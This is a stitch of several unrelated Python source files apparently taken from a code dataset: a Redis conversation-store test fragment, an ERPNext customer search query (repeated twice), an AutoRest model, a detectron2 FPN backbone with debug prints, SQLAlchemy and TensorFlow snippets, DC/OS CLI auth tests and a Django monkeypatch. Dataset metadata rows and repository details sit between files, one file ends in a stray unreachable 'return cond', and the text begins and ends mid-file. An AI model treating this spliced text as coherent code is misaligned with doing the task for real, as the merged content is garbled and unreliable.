        self.assertEqual(conversation2.questions[0].sentence(0)._subjectivity, 0.6)
        self.assertEqual(conversation2.questions[0].properties['qkey1'], "qvalue1")
        self.assertEqual(conversation2.questions[0].properties['qkey2'], "qvalue2")
        store.empty()
    @unittest.skipIf(Engines.redis is False, Engines.redis_disabled)
    def test_conversations_storage_exception_on_save_load(self):
        """Exercise store/load through the mock store.

        NOTE(review): both fail flags are False and nothing is asserted, so
        despite its name this test never provokes or checks an exception —
        confirm the intended flag values / assertRaises were not lost.
        """
        config = RedisStorageConfiguration()
        engine = RedisStorageEngine(config)
        engine.initialise()
        store = MockRedisConversationStore(engine, fail_write=False, fail_read=False)
        client = TestClient()
        client_context = client.create_client_context("user1")
        conversation1 = Conversation(client_context)
        store.store_conversation(client_context, conversation1)
        conversation2 = Conversation(client_context)
        store.load_conversation(client_context, conversation2)
| true | true |
1c3326aed05c037d41918d057a1a93994e862c35 | 1,971 | py | Python | consoleerp_erpnext_client/api/custom_link_queries.py | consoleerp/consoleerp_erpnext_client | 44bc79f45e87c750e739d4cc82a42ecd7b94eb60 | [
"MIT"
] | 3 | 2017-04-02T11:44:01.000Z | 2018-05-04T20:46:19.000Z | consoleerp_erpnext_client/api/custom_link_queries.py | consoleerp/consoleerp_erpnext_client | 44bc79f45e87c750e739d4cc82a42ecd7b94eb60 | [
"MIT"
] | 7 | 2017-03-25T08:31:34.000Z | 2017-05-18T09:48:50.000Z | consoleerp_erpnext_client/api/custom_link_queries.py | consoleerp/consoleerp_erpnext_client | 44bc79f45e87c750e739d4cc82a42ecd7b94eb60 | [
"MIT"
] | 4 | 2017-04-02T11:44:02.000Z | 2019-08-29T17:08:49.000Z | from __future__ import unicode_literals
import frappe
from frappe.desk.reportview import get_match_cond
from frappe.model.db_query import DatabaseQuery
from frappe.utils import nowdate
def customer_query(doctype, txt, searchfield, start, page_len, filters):
	"""Link-field search query for Customer records.

	Follows frappe's reportview search contract: *txt* is matched against
	*searchfield* and customer_name, rows are ranked by match position, and
	filter/permission conditions are appended to the WHERE clause.
	"""
	conditions = []
	cust_master_name = frappe.defaults.get_user_default("cust_master_name")
	select_fields = ["name", "customer_group", "territory"]
	if cust_master_name != "Customer Name":
		select_fields = ["name", "customer_name", "customer_group", "territory"]
	# Append any extra search fields configured on the Customer doctype.
	meta = frappe.get_meta("Customer")
	select_fields.extend(f for f in meta.get_search_fields() if f not in select_fields)
	field_csv = ", ".join(select_fields)
	query = """select {fields} from `tabCustomer`
		where docstatus < 2
			and ({key} like %(txt)s
				or customer_name like %(txt)s) and disabled=0
			{fcond} {mcond}
		order by
			if(locate(%(_txt)s, name), locate(%(_txt)s, name), 99999),
			if(locate(%(_txt)s, customer_name), locate(%(_txt)s, customer_name), 99999),
			idx desc,
			name, customer_name
		limit %(start)s, %(page_len)s""".format(
		fields=field_csv,
		key=searchfield,
		fcond=get_filters_cond(doctype, filters, conditions),
		mcond=get_match_cond(doctype),
	)
	return frappe.db.sql(query, {
		"txt": "%%%s%%" % txt,
		"_txt": txt.replace("%", ""),
		"start": start,
		"page_len": page_len,
	})
def get_filters_cond(doctype, filters, conditions):
	"""Build an SQL " and ..." condition string from reportview-style filters.

	Arguments:
		doctype -- DocType the filters apply to.
		filters -- Either a mapping of fieldname -> value (a string value
			prefixed with "!" meaning "not equal") or a list of filter rows.
		conditions -- Mutable list of pre-existing condition strings;
			extended in place by DatabaseQuery.

	Returns:
		str -- " and <cond> and ..." or "" when no filters were given.
	"""
	if not filters:
		return ''
	# BUGFIX: `basestring` only exists on Python 2 and raises NameError on
	# Python 3; fall back to `str` so this helper works on both.
	try:
		string_types = basestring  # noqa: F821 -- Python 2 only
	except NameError:
		string_types = str
	flt = filters
	if isinstance(filters, dict):
		filters = filters.items()
		flt = []
		for f in filters:
			if isinstance(f[1], string_types) and f[1][0] == '!':
				flt.append([doctype, f[0], '!=', f[1][1:]])
			else:
				value = frappe.db.escape(f[1]) if isinstance(f[1], string_types) else f[1]
				flt.append([doctype, f[0], '=', value])
	query = DatabaseQuery(doctype)
	query.filters = flt
	query.conditions = conditions
	query.build_filter_conditions(flt, conditions)
	return ' and ' + ' and '.join(query.conditions)
import frappe
from frappe.desk.reportview import get_match_cond
from frappe.model.db_query import DatabaseQuery
from frappe.utils import nowdate
def customer_query(doctype, txt, searchfield, start, page_len, filters):
	"""Link-field search query for Customer records.

	Follows frappe's reportview search contract: *txt* is matched against
	*searchfield* and customer_name, rows are ranked by match position, and
	filter/permission conditions are appended to the WHERE clause.
	"""
	conditions = []
	cust_master_name = frappe.defaults.get_user_default("cust_master_name")
	select_fields = ["name", "customer_group", "territory"]
	if cust_master_name != "Customer Name":
		select_fields = ["name", "customer_name", "customer_group", "territory"]
	# Append any extra search fields configured on the Customer doctype.
	meta = frappe.get_meta("Customer")
	select_fields.extend(f for f in meta.get_search_fields() if f not in select_fields)
	field_csv = ", ".join(select_fields)
	query = """select {fields} from `tabCustomer`
		where docstatus < 2
			and ({key} like %(txt)s
				or customer_name like %(txt)s) and disabled=0
			{fcond} {mcond}
		order by
			if(locate(%(_txt)s, name), locate(%(_txt)s, name), 99999),
			if(locate(%(_txt)s, customer_name), locate(%(_txt)s, customer_name), 99999),
			idx desc,
			name, customer_name
		limit %(start)s, %(page_len)s""".format(
		fields=field_csv,
		key=searchfield,
		fcond=get_filters_cond(doctype, filters, conditions),
		mcond=get_match_cond(doctype),
	)
	return frappe.db.sql(query, {
		"txt": "%%%s%%" % txt,
		"_txt": txt.replace("%", ""),
		"start": start,
		"page_len": page_len,
	})
def get_filters_cond(doctype, filters, conditions):
	"""Build an SQL " and ..." condition string from reportview-style filters.

	Arguments:
		doctype -- DocType the filters apply to.
		filters -- Either a mapping of fieldname -> value (a string value
			prefixed with "!" meaning "not equal") or a list of filter rows.
		conditions -- Mutable list of pre-existing condition strings;
			extended in place by DatabaseQuery.

	Returns:
		str -- " and <cond> and ..." or "" when no filters were given.
	"""
	if not filters:
		return ''
	# BUGFIX: `basestring` only exists on Python 2 and raises NameError on
	# Python 3; fall back to `str` so this helper works on both.
	try:
		string_types = basestring  # noqa: F821 -- Python 2 only
	except NameError:
		string_types = str
	flt = filters
	if isinstance(filters, dict):
		filters = filters.items()
		flt = []
		for f in filters:
			if isinstance(f[1], string_types) and f[1][0] == '!':
				flt.append([doctype, f[0], '!=', f[1][1:]])
			else:
				value = frappe.db.escape(f[1]) if isinstance(f[1], string_types) else f[1]
				flt.append([doctype, f[0], '=', value])
	query = DatabaseQuery(doctype)
	query.filters = flt
	query.conditions = conditions
	query.build_filter_conditions(flt, conditions)
	return ' and ' + ' and '.join(query.conditions)
return cond | true | true |
1c33272368020e92f0b9071c611e84c90714f5f1 | 976 | py | Python | MAQTextSDK/models/data_input_data_item_py3.py | maqsoftware/TextAnalyticsSDK | 545533d79db2f23e395495e9968c121ea3474ae4 | [
"MIT"
] | null | null | null | MAQTextSDK/models/data_input_data_item_py3.py | maqsoftware/TextAnalyticsSDK | 545533d79db2f23e395495e9968c121ea3474ae4 | [
"MIT"
] | null | null | null | MAQTextSDK/models/data_input_data_item_py3.py | maqsoftware/TextAnalyticsSDK | 545533d79db2f23e395495e9968c121ea3474ae4 | [
"MIT"
] | 6 | 2020-11-19T07:09:54.000Z | 2021-12-06T10:40:14.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DataInputDataItem(Model):
"""DataInputDataItem.
All required parameters must be populated in order to send to Azure.
:param id: Required.
:type id: str
:param text: Required.
:type text: str
"""
_validation = {
"id": {"required": True},
"text": {"required": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"text": {"key": "text", "type": "str"},
}
def __init__(self, *, id: str, text: str, **kwargs) -> None:
super(DataInputDataItem, self).__init__(**kwargs)
self.id = id
self.text = text
| 27.111111 | 76 | 0.505123 |
from msrest.serialization import Model
class DataInputDataItem(Model):
_validation = {
"id": {"required": True},
"text": {"required": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"text": {"key": "text", "type": "str"},
}
def __init__(self, *, id: str, text: str, **kwargs) -> None:
super(DataInputDataItem, self).__init__(**kwargs)
self.id = id
self.text = text
| true | true |
1c3327f3a2fa39f13359dcded445dadbcae279bc | 8,736 | py | Python | detectron/modeling/backbone/ftt_fpn.py | guowenhao787938711/EFPN-detectron2 | 58caabcf5edd5615f17d844618cf42367e567ee3 | [
"Apache-2.0"
] | 1 | 2021-07-16T06:05:56.000Z | 2021-07-16T06:05:56.000Z | detectron2/modeling/backbone/ftt_fpn.py | Kg6815311/pipe_EFPN_detectron2 | 1a381027cc19845afb88461bd5c96fa0fd75f449 | [
"Apache-2.0"
] | null | null | null | detectron2/modeling/backbone/ftt_fpn.py | Kg6815311/pipe_EFPN_detectron2 | 1a381027cc19845afb88461bd5c96fa0fd75f449 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
import math
import fvcore.nn.weight_init as weight_init
import torch.nn.functional as F
from torch import nn
from detectron2.layers import Conv2d, ShapeSpec, get_norm
from .backbone import Backbone
from .build import BACKBONE_REGISTRY
from .resnet import build_resnet_backbone
from .ftt import FTT
__all__ = ["build_resnet_fpn_backbone",
#"build_retinanet_resnet_fpn_backbone",
"FPN"]
class FPN(Backbone):
"""
This module implements :paper:`FPN`.
It creates pyramid features built on top of some input feature maps.
"""
def __init__(
self, bottom_up, in_features, out_channels, norm="", top_block=None, fuse_type="sum"
):
"""
Args:
bottom_up (Backbone): module representing the bottom up subnetwork.
Must be a subclass of :class:`Backbone`. The multi-scale feature
maps generated by the bottom up network, and listed in `in_features`,
are used to generate FPN levels.
in_features (list[str]): names of the input feature maps coming
from the backbone to which FPN is attached. For example, if the
backbone produces ["res2", "res3", "res4"], any *contiguous* sublist
of these may be used; order must be from high to low resolution.
out_channels (int): number of channels in the output feature maps.
norm (str): the normalization to use.
top_block (nn.Module or None): if provided, an extra operation will
be performed on the output of the last (smallest resolution)
FPN output, and the result will extend the result list. The top_block
further downsamples the feature map. It must have an attribute
"num_levels", meaning the number of extra FPN levels added by
this block, and "in_feature", which is a string representing
its input feature (e.g., p5).
fuse_type (str): types for fusing the top down features and the lateral
ones. It can be "sum" (default), which sums up element-wise; or "avg",
which takes the element-wise mean of the two.
"""
super(FPN, self).__init__()
assert isinstance(bottom_up, Backbone)
assert in_features, in_features
# Feature map strides and channels from the bottom up network (e.g. ResNet)
input_shapes = bottom_up.output_shape()
strides = [input_shapes[f].stride for f in in_features]
in_channels_per_feature = [input_shapes[f].channels for f in in_features]
_assert_strides_are_log2_contiguous(strides)
lateral_convs = []
output_convs = []
use_bias = norm == ""
for idx, in_channels in enumerate(in_channels_per_feature):
# doesn't fix checkpoint dimension problem :(
# if idx > len(in_channels_per_feature) - 3:
# in_channels //= 2
lateral_norm = get_norm(norm, out_channels)
output_norm = get_norm(norm, out_channels)
lateral_conv = Conv2d(
in_channels, out_channels, kernel_size=1, bias=use_bias, norm=lateral_norm
)
output_conv = Conv2d(
out_channels,
out_channels,
kernel_size=3,
stride=1,
padding=1,
bias=use_bias,
norm=output_norm,
)
weight_init.c2_xavier_fill(lateral_conv)
weight_init.c2_xavier_fill(output_conv)
stage = int(math.log2(strides[idx]))
self.add_module("fpn_lateral{}".format(stage), lateral_conv)
self.add_module("fpn_output{}".format(stage), output_conv)
lateral_convs.append(lateral_conv)
output_convs.append(output_conv)
# Place convs into top-down order (from low to high resolution)
# to make the top-down computation in forward clearer.
self.lateral_convs = lateral_convs[::-1]
self.output_convs = output_convs[::-1]
self.top_block = top_block
self.in_features = in_features
self.bottom_up = bottom_up
# Return feature names are "p<stage>", like ["p2", "p3", ..., "p6"]
self._out_feature_strides = {"p{}".format(int(math.log2(s))): s for s in strides}
# top block output feature maps.
if self.top_block is not None:
for s in range(stage, stage + self.top_block.num_levels):
self._out_feature_strides["p{}".format(s + 1)] = 2 ** (s + 1)
self._out_features = list(self._out_feature_strides.keys())
self._out_feature_channels = {k: out_channels for k in self._out_features}
self.ftt = FTT(self, ['p2', 'p3'], out_channels)
self._size_divisibility = strides[-1]
assert fuse_type in {"avg", "sum"}
self._fuse_type = fuse_type
@property
def size_divisibility(self):
return self._size_divisibility
def forward(self, x):
"""
Args:
input (dict[str->Tensor]): mapping feature map name (e.g., "res5") to
feature map tensor for each feature level in high to low resolution order.
Returns:
dict[str->Tensor]:
mapping from feature map name to FPN feature map tensor
in high to low resolution order. Returned feature names follow the FPN
paper convention: "p<stage>", where stage has stride = 2 ** stage e.g.,
["p2", "p3", ..., "p6"].
"""
# Reverse feature maps into top-down order (from low to high resolution)
bottom_up_features = self.bottom_up(x)
x = [bottom_up_features[f] for f in self.in_features[::-1]]
results = []
prev_features = self.lateral_convs[0](x[0])
results.append(self.output_convs[0](prev_features))
for features, lateral_conv, output_conv in zip(
x[1:], self.lateral_convs[1:], self.output_convs[1:]
):
top_down_features = F.interpolate(prev_features, scale_factor=2, mode="nearest")
lateral_features = lateral_conv(features)
prev_features = lateral_features + top_down_features
if self._fuse_type == "avg":
prev_features /= 2
results.insert(0, output_conv(prev_features))
if self.top_block is not None:
top_block_in_feature = bottom_up_features.get(self.top_block.in_feature, None)
if top_block_in_feature is None:
top_block_in_feature = results[self._out_features.index(self.top_block.in_feature)]
results.extend(self.top_block(top_block_in_feature))
assert len(self._out_features) == len(results)
ret = dict(zip(self._out_features, results))
print("\nret1: ")
print(ret, '\n', '-----------', '\n\n')
ret['p3\''] = self.ftt.forward(ret)
print("\nret2: ")
print(ret,'---\n')
return ret
def output_shape(self):
return {
name: ShapeSpec(
channels=self._out_feature_channels[name], stride=self._out_feature_strides[name]
)
for name in self._out_features
}
def _assert_strides_are_log2_contiguous(strides):
"""
Assert that each stride is 2x times its preceding stride, i.e. "contiguous in log2".
"""
for i, stride in enumerate(strides[1:], 1):
assert stride == 2 * strides[i - 1], "Strides {} {} are not log2 contiguous".format(
stride, strides[i - 1]
)
class LastLevelMaxPool(nn.Module):
"""
This module is used in the original FPN to generate a downsampled
P6 feature from P5.
"""
def __init__(self):
super().__init__()
self.num_levels = 1
self.in_feature = "p6" # originally p5
def forward(self, x):
return [F.max_pool2d(x, kernel_size=1, stride=2, padding=0)]
@BACKBONE_REGISTRY.register()
def build_resnet_fpn_backbone(cfg, input_shape: ShapeSpec):
"""
Args:
cfg: a detectron2 CfgNode
Returns:
backbone (Backbone): backbone module, must be a subclass of :class:`Backbone`.
"""
bottom_up = build_resnet_backbone(cfg, input_shape)
in_features = cfg.MODEL.FPN.IN_FEATURES
out_channels = cfg.MODEL.FPN.OUT_CHANNELS
backbone = FPN(
bottom_up=bottom_up,
in_features=in_features,
out_channels=out_channels,
norm=cfg.MODEL.FPN.NORM,
top_block=LastLevelMaxPool(),
fuse_type=cfg.MODEL.FPN.FUSE_TYPE,
)
return backbone
| 39.529412 | 99 | 0.616529 |
import math
import fvcore.nn.weight_init as weight_init
import torch.nn.functional as F
from torch import nn
from detectron2.layers import Conv2d, ShapeSpec, get_norm
from .backbone import Backbone
from .build import BACKBONE_REGISTRY
from .resnet import build_resnet_backbone
from .ftt import FTT
__all__ = ["build_resnet_fpn_backbone",
"FPN"]
class FPN(Backbone):
def __init__(
self, bottom_up, in_features, out_channels, norm="", top_block=None, fuse_type="sum"
):
super(FPN, self).__init__()
assert isinstance(bottom_up, Backbone)
assert in_features, in_features
input_shapes = bottom_up.output_shape()
strides = [input_shapes[f].stride for f in in_features]
in_channels_per_feature = [input_shapes[f].channels for f in in_features]
_assert_strides_are_log2_contiguous(strides)
lateral_convs = []
output_convs = []
use_bias = norm == ""
for idx, in_channels in enumerate(in_channels_per_feature):
# if idx > len(in_channels_per_feature) - 3:
# in_channels //= 2
lateral_norm = get_norm(norm, out_channels)
output_norm = get_norm(norm, out_channels)
lateral_conv = Conv2d(
in_channels, out_channels, kernel_size=1, bias=use_bias, norm=lateral_norm
)
output_conv = Conv2d(
out_channels,
out_channels,
kernel_size=3,
stride=1,
padding=1,
bias=use_bias,
norm=output_norm,
)
weight_init.c2_xavier_fill(lateral_conv)
weight_init.c2_xavier_fill(output_conv)
stage = int(math.log2(strides[idx]))
self.add_module("fpn_lateral{}".format(stage), lateral_conv)
self.add_module("fpn_output{}".format(stage), output_conv)
lateral_convs.append(lateral_conv)
output_convs.append(output_conv)
# Place convs into top-down order (from low to high resolution)
# to make the top-down computation in forward clearer.
self.lateral_convs = lateral_convs[::-1]
self.output_convs = output_convs[::-1]
self.top_block = top_block
self.in_features = in_features
self.bottom_up = bottom_up
# Return feature names are "p<stage>", like ["p2", "p3", ..., "p6"]
self._out_feature_strides = {"p{}".format(int(math.log2(s))): s for s in strides}
# top block output feature maps.
if self.top_block is not None:
for s in range(stage, stage + self.top_block.num_levels):
self._out_feature_strides["p{}".format(s + 1)] = 2 ** (s + 1)
self._out_features = list(self._out_feature_strides.keys())
self._out_feature_channels = {k: out_channels for k in self._out_features}
self.ftt = FTT(self, ['p2', 'p3'], out_channels)
self._size_divisibility = strides[-1]
assert fuse_type in {"avg", "sum"}
self._fuse_type = fuse_type
@property
def size_divisibility(self):
return self._size_divisibility
def forward(self, x):
# Reverse feature maps into top-down order (from low to high resolution)
bottom_up_features = self.bottom_up(x)
x = [bottom_up_features[f] for f in self.in_features[::-1]]
results = []
prev_features = self.lateral_convs[0](x[0])
results.append(self.output_convs[0](prev_features))
for features, lateral_conv, output_conv in zip(
x[1:], self.lateral_convs[1:], self.output_convs[1:]
):
top_down_features = F.interpolate(prev_features, scale_factor=2, mode="nearest")
lateral_features = lateral_conv(features)
prev_features = lateral_features + top_down_features
if self._fuse_type == "avg":
prev_features /= 2
results.insert(0, output_conv(prev_features))
if self.top_block is not None:
top_block_in_feature = bottom_up_features.get(self.top_block.in_feature, None)
if top_block_in_feature is None:
top_block_in_feature = results[self._out_features.index(self.top_block.in_feature)]
results.extend(self.top_block(top_block_in_feature))
assert len(self._out_features) == len(results)
ret = dict(zip(self._out_features, results))
print("\nret1: ")
print(ret, '\n', '-----------', '\n\n')
ret['p3\''] = self.ftt.forward(ret)
print("\nret2: ")
print(ret,'---\n')
return ret
def output_shape(self):
return {
name: ShapeSpec(
channels=self._out_feature_channels[name], stride=self._out_feature_strides[name]
)
for name in self._out_features
}
def _assert_strides_are_log2_contiguous(strides):
for i, stride in enumerate(strides[1:], 1):
assert stride == 2 * strides[i - 1], "Strides {} {} are not log2 contiguous".format(
stride, strides[i - 1]
)
class LastLevelMaxPool(nn.Module):
def __init__(self):
super().__init__()
self.num_levels = 1
self.in_feature = "p6"
def forward(self, x):
return [F.max_pool2d(x, kernel_size=1, stride=2, padding=0)]
@BACKBONE_REGISTRY.register()
def build_resnet_fpn_backbone(cfg, input_shape: ShapeSpec):
bottom_up = build_resnet_backbone(cfg, input_shape)
in_features = cfg.MODEL.FPN.IN_FEATURES
out_channels = cfg.MODEL.FPN.OUT_CHANNELS
backbone = FPN(
bottom_up=bottom_up,
in_features=in_features,
out_channels=out_channels,
norm=cfg.MODEL.FPN.NORM,
top_block=LastLevelMaxPool(),
fuse_type=cfg.MODEL.FPN.FUSE_TYPE,
)
return backbone
| true | true |
1c332877e8cbf590e4cefbf6c34341c2dc3f327f | 1,281 | py | Python | models/work_concept.py | zbj-labs/openalex-guts | 4e54363591da66b35a7376009ad1bca534559f98 | [
"MIT"
] | null | null | null | models/work_concept.py | zbj-labs/openalex-guts | 4e54363591da66b35a7376009ad1bca534559f98 | [
"MIT"
] | null | null | null | models/work_concept.py | zbj-labs/openalex-guts | 4e54363591da66b35a7376009ad1bca534559f98 | [
"MIT"
] | null | null | null | from cached_property import cached_property
from app import db
# truncate mid.work_concept
# insert into mid.work_concept (select * from legacy.mag_advanced_paper_fields_of_study)
# refresh materialized view mid.work_concept_for_api_mv
class WorkConcept(db.Model):
__table_args__ = {'schema': 'mid'}
__tablename__ = "work_concept_for_api_mv"
paper_id = db.Column(db.BigInteger, db.ForeignKey("mid.work.paper_id"), primary_key=True)
field_of_study = db.Column(db.BigInteger, db.ForeignKey("mid.concept_for_api_mv.field_of_study_id"), primary_key=True)
score = db.Column(db.Float)
def to_dict(self, return_level="full"):
response = self.concept.to_dict(return_level)
response["score"] = self.score
return response
def __repr__(self):
return "<WorkConcept ( {} ) {}>".format(self.paper_id, self.field_of_study)
class WorkConceptFull(db.Model):
__table_args__ = {'schema': 'mid'}
__tablename__ = "work_concept"
paper_id = db.Column(db.BigInteger, db.ForeignKey("mid.work.paper_id"), primary_key=True)
field_of_study = db.Column(db.BigInteger, db.ForeignKey("mid.concept_for_api_mv.field_of_study_id"), primary_key=True)
score = db.Column(db.Float)
algorithm_version = db.Column(db.Numeric)
| 35.583333 | 122 | 0.736144 | from cached_property import cached_property
from app import db
class WorkConcept(db.Model):
__table_args__ = {'schema': 'mid'}
__tablename__ = "work_concept_for_api_mv"
paper_id = db.Column(db.BigInteger, db.ForeignKey("mid.work.paper_id"), primary_key=True)
field_of_study = db.Column(db.BigInteger, db.ForeignKey("mid.concept_for_api_mv.field_of_study_id"), primary_key=True)
score = db.Column(db.Float)
def to_dict(self, return_level="full"):
response = self.concept.to_dict(return_level)
response["score"] = self.score
return response
def __repr__(self):
return "<WorkConcept ( {} ) {}>".format(self.paper_id, self.field_of_study)
class WorkConceptFull(db.Model):
__table_args__ = {'schema': 'mid'}
__tablename__ = "work_concept"
paper_id = db.Column(db.BigInteger, db.ForeignKey("mid.work.paper_id"), primary_key=True)
field_of_study = db.Column(db.BigInteger, db.ForeignKey("mid.concept_for_api_mv.field_of_study_id"), primary_key=True)
score = db.Column(db.Float)
algorithm_version = db.Column(db.Numeric)
| true | true |
1c332a2579cdb6149a4ddf3406958e98917add97 | 174 | py | Python | tests/model_control/detailed/transf_Integration/model_control_one_enabled_Integration_ConstantTrend_Seasonal_MonthOfYear_SVR.py | jmabry/pyaf | afbc15a851a2445a7824bf255af612dc429265af | [
"BSD-3-Clause"
] | null | null | null | tests/model_control/detailed/transf_Integration/model_control_one_enabled_Integration_ConstantTrend_Seasonal_MonthOfYear_SVR.py | jmabry/pyaf | afbc15a851a2445a7824bf255af612dc429265af | [
"BSD-3-Clause"
] | 1 | 2019-11-30T23:39:38.000Z | 2019-12-01T04:34:35.000Z | tests/model_control/detailed/transf_Integration/model_control_one_enabled_Integration_ConstantTrend_Seasonal_MonthOfYear_SVR.py | jmabry/pyaf | afbc15a851a2445a7824bf255af612dc429265af | [
"BSD-3-Clause"
] | null | null | null | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Integration'] , ['ConstantTrend'] , ['Seasonal_MonthOfYear'] , ['SVR'] ); | 43.5 | 96 | 0.770115 | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Integration'] , ['ConstantTrend'] , ['Seasonal_MonthOfYear'] , ['SVR'] ); | true | true |
1c332adf25a96537958b311ef5dcb734e23f444c | 1,047 | py | Python | seq2seq/metrics/test.py | gyy8426/TF_concaption | 7b3face47c96c885b2715605122328b7b6bef609 | [
"Apache-2.0"
] | null | null | null | seq2seq/metrics/test.py | gyy8426/TF_concaption | 7b3face47c96c885b2715605122328b7b6bef609 | [
"Apache-2.0"
] | null | null | null | seq2seq/metrics/test.py | gyy8426/TF_concaption | 7b3face47c96c885b2715605122328b7b6bef609 | [
"Apache-2.0"
] | null | null | null | import tensorflow as tf
from tensorflow.contrib import metrics
from tensorflow.contrib.learn import MetricSpec
def accumulate_strings(values, name="strings"):
"""Accumulates strings into a vector.
Args:
values: A 1-d string tensor that contains values to add to the accumulator.
Returns:
A tuple (value_tensor, update_op).
"""
tf.assert_type(values, tf.string)
strings = tf.Variable(
name=name,
initial_value=[],
dtype=tf.string,
trainable=False,
collections=[],
validate_shape=True)
value_tensor = tf.identity(strings)
update_op = tf.assign(
ref=strings, value=tf.concat([strings, values], 0), validate_shape=False)
return value_tensor, update_op
a = ["as asd asd","asd sad","sadasd sd","a a a"]
b = [a,a,a]
print("!!!!!!!!!!b :",b)
c = accumulate_strings(b)
gpu_options = tf.GPUOptions(allow_growth=True)
sess = tf.InteractiveSession(config=tf.ConfigProto(gpu_options=gpu_options))
resluts = sess.run(c)
print("results :",resluts)
| 27.552632 | 80 | 0.674308 | import tensorflow as tf
from tensorflow.contrib import metrics
from tensorflow.contrib.learn import MetricSpec
def accumulate_strings(values, name="strings"):
tf.assert_type(values, tf.string)
strings = tf.Variable(
name=name,
initial_value=[],
dtype=tf.string,
trainable=False,
collections=[],
validate_shape=True)
value_tensor = tf.identity(strings)
update_op = tf.assign(
ref=strings, value=tf.concat([strings, values], 0), validate_shape=False)
return value_tensor, update_op
a = ["as asd asd","asd sad","sadasd sd","a a a"]
b = [a,a,a]
print("!!!!!!!!!!b :",b)
c = accumulate_strings(b)
gpu_options = tf.GPUOptions(allow_growth=True)
sess = tf.InteractiveSession(config=tf.ConfigProto(gpu_options=gpu_options))
resluts = sess.run(c)
print("results :",resluts)
| true | true |
1c332b281ac35c1405ffb25ee199f2a15ddae1dc | 1,261 | py | Python | python/lib/dcoscli/tests/integrations/test_auth.py | bamarni/dcos-core-cli | a550652477175f48708a361fd0d65e21d243cded | [
"Apache-2.0",
"MIT"
] | null | null | null | python/lib/dcoscli/tests/integrations/test_auth.py | bamarni/dcos-core-cli | a550652477175f48708a361fd0d65e21d243cded | [
"Apache-2.0",
"MIT"
] | null | null | null | python/lib/dcoscli/tests/integrations/test_auth.py | bamarni/dcos-core-cli | a550652477175f48708a361fd0d65e21d243cded | [
"Apache-2.0",
"MIT"
] | null | null | null | import os
import pytest
from dcos import constants
from dcoscli.test.common import assert_command, exec_command, update_config
@pytest.fixture
def env():
r = os.environ.copy()
r.update({constants.PATH_ENV: os.environ[constants.PATH_ENV]})
return r
def test_info():
stdout = b'Authenticate to DC/OS cluster\n'
assert_command(['dcos', 'auth', '--info'],
stdout=stdout)
def test_version():
stdout = b'dcos-auth version SNAPSHOT\n'
assert_command(['dcos', 'auth', '--version'],
stdout=stdout)
def test_logout_no_token(env):
with update_config("core.dcos_acs_token", None, env):
returncode, _, stderr = exec_command(
['dcos', 'config', 'show', 'core.dcos_acs_token'], env=env)
assert returncode == 1
assert stderr == b"Property 'core.dcos_acs_token' doesn't exist\n"
def test_logout_with_token(env):
with update_config("core.dcos_acs_token", "foobar", env):
stderr = b"[core.dcos_acs_token]: changed\n"
assert_command(
['dcos', 'config', 'set', 'core.dcos_acs_token', 'faketoken'],
stderr=stderr,
env=env)
assert_command(['dcos', 'auth', 'logout'],
env=env)
| 26.270833 | 75 | 0.620936 | import os
import pytest
from dcos import constants
from dcoscli.test.common import assert_command, exec_command, update_config
@pytest.fixture
def env():
r = os.environ.copy()
r.update({constants.PATH_ENV: os.environ[constants.PATH_ENV]})
return r
def test_info():
stdout = b'Authenticate to DC/OS cluster\n'
assert_command(['dcos', 'auth', '--info'],
stdout=stdout)
def test_version():
stdout = b'dcos-auth version SNAPSHOT\n'
assert_command(['dcos', 'auth', '--version'],
stdout=stdout)
def test_logout_no_token(env):
with update_config("core.dcos_acs_token", None, env):
returncode, _, stderr = exec_command(
['dcos', 'config', 'show', 'core.dcos_acs_token'], env=env)
assert returncode == 1
assert stderr == b"Property 'core.dcos_acs_token' doesn't exist\n"
def test_logout_with_token(env):
with update_config("core.dcos_acs_token", "foobar", env):
stderr = b"[core.dcos_acs_token]: changed\n"
assert_command(
['dcos', 'config', 'set', 'core.dcos_acs_token', 'faketoken'],
stderr=stderr,
env=env)
assert_command(['dcos', 'auth', 'logout'],
env=env)
| true | true |
1c332b4a13f5fefc7873b7b77a62dad93a489440 | 2,703 | py | Python | apps/sumo/monkeypatch.py | taliasman/kitsune | f8085205eef143011adb4c52d1f183da06c1c58e | [
"BSD-3-Clause"
] | 2 | 2019-08-19T17:08:47.000Z | 2019-10-05T11:37:02.000Z | apps/sumo/monkeypatch.py | taliasman/kitsune | f8085205eef143011adb4c52d1f183da06c1c58e | [
"BSD-3-Clause"
] | null | null | null | apps/sumo/monkeypatch.py | taliasman/kitsune | f8085205eef143011adb4c52d1f183da06c1c58e | [
"BSD-3-Clause"
] | null | null | null | from django.forms import fields
from django.forms import widgets
# Monkey patch preserves the old values, so we can pick up any changes
# in CharField.widget_attrs and Field.widget_attrs
# paulc filed a Django ticket for it, #14884
field_widget_attrs = fields.Field.widget_attrs
charfield_widget_attrs = fields.CharField.widget_attrs
def required_field_attrs(self, widget):
"""This function is for use on the base Field class."""
attrs = field_widget_attrs(self, widget)
# required="required" isn't supported for groups of checkboxes.
if (self.required and (not 'required' in attrs) and
not isinstance(widget, widgets.CheckboxSelectMultiple)):
attrs['required'] = 'required'
return attrs
def required_char_field_attrs(self, widget, *args, **kwargs):
"""This function is for use on the CharField class."""
# We need to call super() here, since Django's CharField.widget_attrs
# doesn't call its super and thus won't use the required_field_attrs above.
attrs = super(fields.CharField, self).widget_attrs(widget, *args, **kwargs)
original_attrs = charfield_widget_attrs(self, widget) or {}
attrs.update(original_attrs)
return attrs
class DateWidget(fields.DateField.widget):
input_type = 'date'
class TimeWidget(fields.TimeField.widget):
input_type = 'time'
class URLWidget(fields.URLField.widget):
input_type = 'url'
class EmailWidget(fields.EmailField.widget):
input_type = 'email'
fields.Field.widget_attrs = required_field_attrs
fields.CharField.widget_attrs = required_char_field_attrs
fields.DateField.widget = DateWidget
fields.TimeField.widget = TimeWidget
fields.URLField.widget = URLWidget
fields.EmailField.widget = EmailWidget
# Workaround until https://code.djangoproject.com/ticket/16920 gets fixed.
from django.contrib.admin import util
from django.contrib.admin.util import NestedObjects
from django.db import models
